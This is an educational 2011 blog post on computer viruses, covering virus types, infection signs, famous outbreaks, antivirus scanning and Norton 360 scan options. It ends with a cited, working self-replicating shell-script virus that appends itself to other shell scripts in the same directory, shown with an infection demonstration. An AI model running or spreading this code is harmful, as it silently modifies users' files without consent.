Sunday 2 October 2011

Virus Threats in a Computer

WHAT IS A COMPUTER VIRUS?

A computer virus is called a virus because they share some traits like that of the Biological Virus and passes from one computer to another like the biological virus passes from one person to another. Virus is a computer program that can replicate itself and spread from one system to another. For example, A virus get attached with a Word File then every time when the user runs that word file, the virus also runs and gets replicated.

There are different types of computer virus like E-mail viruses, Trojan Horse, Worm, etc. E-mail viruses are the viruses that that travels as an attachment to e-mail messages and gets multiplied by mailing itself to a number of people in the victim's address book. Trojan Horses are indeed a computer program they have no way to replicate themselves. This computer program tends to do something but instead do damage to the computer when the user runs it like it can erase our hard disk. Worms are computer programs that use computer networks and security holes to replicate. A copy of worm scans the computer network for other systems and gets replicated there.

[Partly adopted from www.wikipedia.com and www.howstuffworks.com]


WHAT ARE THE TYPICAL OBSERVABLE ATTRIBUTES WHEN A COMPUTER IS INFECTED WITH VIRUS?

The first sign when the computer gets infected by a virus is that the system starts to slow down, hangs stops responding, applications fail to work properly, certain error messages are displayed and moreover the hard disk might be in-accessible. The system restarts itself or certain strange tasks are started automatically. Some error messages are as follows-


INTERESTING THING ABOUT COMPUTER VIRUS-

Viruses are extremely dangerous for our systems. Experts estimate that the Mydoom Worm infected approximately a quarter-million computers in a single day in January 2004. Back in March 1999, the Melissa Virus was so powerful that it forced Microsoft and a number of other very large companies to completely turn off their e-mail systems until the virus could be contained. The ILOVEYOU virus in 2000 had a similarly devastating effect. In January 2007, a worm called Storm appeared - by October, experts believed up to 50 million computers were infected.

[Source - www.howstuffworks.com/virus.htm]


HOW DOES A VIRUS DETECTION TOOL SCANS AND FILTERS THE VIRUS FROM THE COMPUTER FILES?

A virus detection tool implements numerous ways to scan and filter the virus from the system of the infected files from the system. One such technique is based on the signature of the virus, i.e., it uses the list of pre-defined list of the virus-signature definitions but it becomes necessary to update this kind of anti-virus because the virus authors keeps on updating the types of virus programs so to keep protected against the virus or malware threat it becomes mandatory for us to keep the anti-virus updated.

Another such technique is based on the fact that there are certain viruses that start with some kind of infection and they become variants by the help of other attackers or malwares. In this kind of scanning the anti-virus looks for the virus-signature of the original virus that can help to detect the entire family of that kind of virus very quickly and scan for the areas in which this family is found.

In this way an anti-virus completes its job.


WHAT CAN BE DONE TO SPEED UP THE OPERATIONS OF THE VIRUS DETECTION TOOL?

In order to speed up the operation of any anti-virus one can reduce the amount of files to be scanned for the virus-scan, in this manner the recently added or installed applications are only checked for the virus or malware and the rest old or previously used files are left out. This increases the speed of the Anti-Virus.


WALK THROUGH THE DIFFERENT STEPS IN NORTON ANTI-VIRUS

Here is a short Walk Through of the NORTON 360 illustrated with the help of images.

This is how the NORTON 360 screen looks like when-ever there is some kind of error or malware detected in the system.


These are the variety of Scans offered by this anti-virus.

Under Computer Scans-Quick scan looks up for the virus threats in the main sectors of the system like the Windows partition,Full System Scan looks up for the virus threats in the entire system and creates a back-up file also,Custom Scan refers to the scan in which we can manually specify the areas to look for the virus threats and the errors or corrupted files in the system.Under Reputation Scans NORTON 360 scans for the performance of the system, it also offers the Quick Scan, Full System Scan, and Custom Scan which functions similarly what we understood in the Computer Scans.This Anti-Virus also offers a scan for the Facebook Wall, it functions as follows-






SIMPLE VIRUS PROGRAM USING SHELL SCRIPT-

This is a simple shell-script virus program developed by M. Douglas, a 150-byte version which he named Traductor simplicimus.

[Source-http://www.kernelthread.com/publications/security/vunix.html]


% ls

infected.sh hello.sh

% cat hello.sh

#!/bin/sh

echo "Hello, World!"

% ./infected.sh

/* whatever output it is supposed to product */

% cat hello.sh

#!/bin/sh

echo "Hello, World!"

for i in * #virus#

do case "`sed 1q $i`" in

"#!/bin/sh")

grep '#virus#' $i >/dev/null ||

sed -n '/#virus#/,$p' $0 >>$i

esac

done 2>/dev/null

No comments:

Post a Comment